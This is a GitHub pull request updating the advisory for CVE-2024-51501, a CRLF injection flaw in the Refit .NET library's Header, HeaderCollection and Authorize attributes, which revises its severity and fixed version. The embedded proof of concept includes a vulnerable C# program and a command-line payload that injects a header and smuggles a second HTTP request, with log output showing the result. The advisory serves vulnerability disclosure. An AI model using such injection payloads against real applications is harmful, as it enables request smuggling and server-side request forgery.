Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[GHSA-3hxg-fxwm-8gf7] CRLF injection in Refit's [Header], [HeaderCollection] and [Authorize] attributes #4994

Merged
merged 1 commit into from
Nov 8, 2024
Merged

[GHSA-3hxg-fxwm-8gf7] CRLF injection in Refit's [Header], [HeaderCollection] and [Authorize] attributes #4994

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 4 additions & 8 deletions advisories/github-reviewed/2024/11/GHSA-3hxg-fxwm-8gf7/GHSA-3hxg-fxwm-8gf7.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,21 +1,17 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3hxg-fxwm-8gf7",
"modified": "2024-11-05T14:39:45Z",
"modified": "2024-11-05T14:39:46Z",
"published": "2024-11-04T23:23:17Z",
"aliases": [
"CVE-2024-51501"
],
"summary": "CRLF injection in Refit's [Header], [HeaderCollection] and [Authorize] attributes ",
"details": "### Summary\nThe various header-related Refit attributes (Header, HeaderCollection and Authorize) are vulnerable to CRLF injection.\n\n### Details\nThe way HTTP headers are added to a request is via the `HttpHeaders.TryAddWithoutValidation` method: <https://github.com/reactiveui/refit/blob/258a771f44417c6e48e103ac921fe4786f3c2a1e/Refit/RequestBuilderImplementation.cs#L1328>\nThis method does not check for CRLF characters in the header value.\n\nThis means that any headers added to a refit request are vulnerable to CRLF-injection. In general, CRLF-injection into a HTTP header (when using HTTP/1.1) means that one can inject additional HTTP headers or smuggle whole HTTP requests.\n\n### PoC\nThe below example code creates a console app that takes one command line variable (a bearer token) and then makes a request to some status page with the provided token inserted in the \"Authorization\" header:\n\n```c#\nusing Refit;\n\ninternal class Program\n{\n private static void Main(string[] args)\n {\n // Usage: dotnet run <bearer token> \n string token = args[0];\n var service = RestService.For<IStatusApi>(\"http://insert.some.site.here\");\n string response = service.GetStatus(token).Result;\n Console.WriteLine($\"Response: {response}\");\n }\n\n public interface IStatusApi\n {\n [Get(\"/status\")]\n Task<string> GetStatus([Authorize(\"Bearer\")] string token);\n }\n}\n```\n\nThis application is now vulnerable to CRLF-injection, and can thus be abused to for example perform request splitting and thus server side request forgery (SSRF):\n\n```bash\nanonymous@ubuntu-sofia-672448:~$ dotnet Refit-cli.dll $'test\\r\\nUser-Agent: injected header!\\r\\n\\r\\nGET /smuggled HTTP/1.1\\r\\nHost: insert.some.site.here'\nResponse: <html></html>\n```\n\nThe application intends to send a single request of the form:\n```http\nGET /status HTTP/1.1\nHost: insert.some.site.here\nAuthorization: Bearer <bearer token>\n```\nBut as the application is vulnerable to CRLF injection the above command will instead result in the following two requests being sent:\n```http\nGET /status HTTP/1.1\nHost: insert.some.site.here\nAuthorization: Bearer test\nUser-Agent: injected header!\n```\nand\n```http\nGET /smuggled HTTP/1.1\nHost: insert.some.site.here\n```\n\nThis can be confirmed by checking the access logs on the server where these commands were run (with `insert.some.site.here` pointing to localhost):\n```bash\nanonymous@ubuntu-sofia-672448:~$ sudo tail /var/log/apache2/access.log\n127.0.0.1 - - [29/Aug/2024:12:17:34 +0000] \"GET /status HTTP/1.1\" 200 240 \"-\" \"injected header!\"\n127.0.0.1 - - [29/Aug/2024:12:17:34 +0000] \"GET /smuggled HTTP/1.1\" 404 436 \"-\" \"-\"\n```\n\n### Impact\nIf an application using the Refit library passes a user-controllable value through to a header, then that application becomes vulnerable to CRLF-injection. This is not necessarily a security issue for a command line application like the one above, but if such code were present in a web application then it becomes vulnerable to request splitting (as shown in the PoC) and thus Server Side Request Forgery.\n\nStrictly speaking this is a potential vulnerability in applications using Refit, not in Refit itself, but I would argue that at the very least there needs to be a warning about this behaviour in the Refit documentation.\n\n",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
},
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
}
],
"affected": [
Expand All @@ -32,7 +28,7 @@
"introduced": "0"
},
{
"fixed": "8.0.0"
"fixed": "7.2.22"
}
]
}
Expand Down Expand Up @@ -65,7 +61,7 @@
"cwe_ids": [
"CWE-93"
],
"severity": "HIGH",
"severity": "CRITICAL",
"github_reviewed": true,
"github_reviewed_at": "2024-11-04T23:23:17Z",
"nvd_published_at": "2024-11-04T23:15:04Z"
Expand Down
Loading